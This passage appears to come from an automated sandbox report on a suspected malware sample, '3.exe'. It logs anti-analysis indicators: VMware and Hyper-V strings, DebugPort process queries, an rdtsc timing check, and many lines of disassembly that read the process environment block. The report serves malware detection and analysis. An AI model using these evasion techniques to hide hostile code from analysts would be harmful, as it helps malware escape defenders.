          Source: explorer.exe, 00000005.00000000.293662200.0000000005603000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000005.00000000.267696288.0000000008220000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.267696288.0000000008220000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000005.00000000.267696288.0000000008220000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\3.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\3.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\ipconfig.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\3.exe Code function: 1_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\3.exe Code function: 1_2_00409B10 LdrLoadDll,
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B23884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B23884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B3B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ABB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ABB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ABB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ABB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B74015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B74015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B27016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B27016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B27016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B71074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B62073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B649A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B649A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B649A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B649A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B269A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AAB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AAB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AAB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B341E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AAC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AAB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AAB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ABAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ABAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B6AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B6AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AB8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AAAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AAAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B5B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B5B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B78A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B6EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B34257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B75BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AB1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AB1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B5D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B6138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B523E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B523E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B523E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B253CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B253CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B6131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AADB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AADB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B78B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AAF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AB849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B26CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B26CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B26CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B614FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B78CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B7740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B7740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B7740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B3C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B3C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B705AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B705AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AD2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AD2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00AD2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00ADFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00ADFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B58DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00ABD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00ABD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B6FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B6FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B6FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B6FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exe | Code function: 1_2_00B26DC9 mov eax, dword ptr fs:[00000030h]
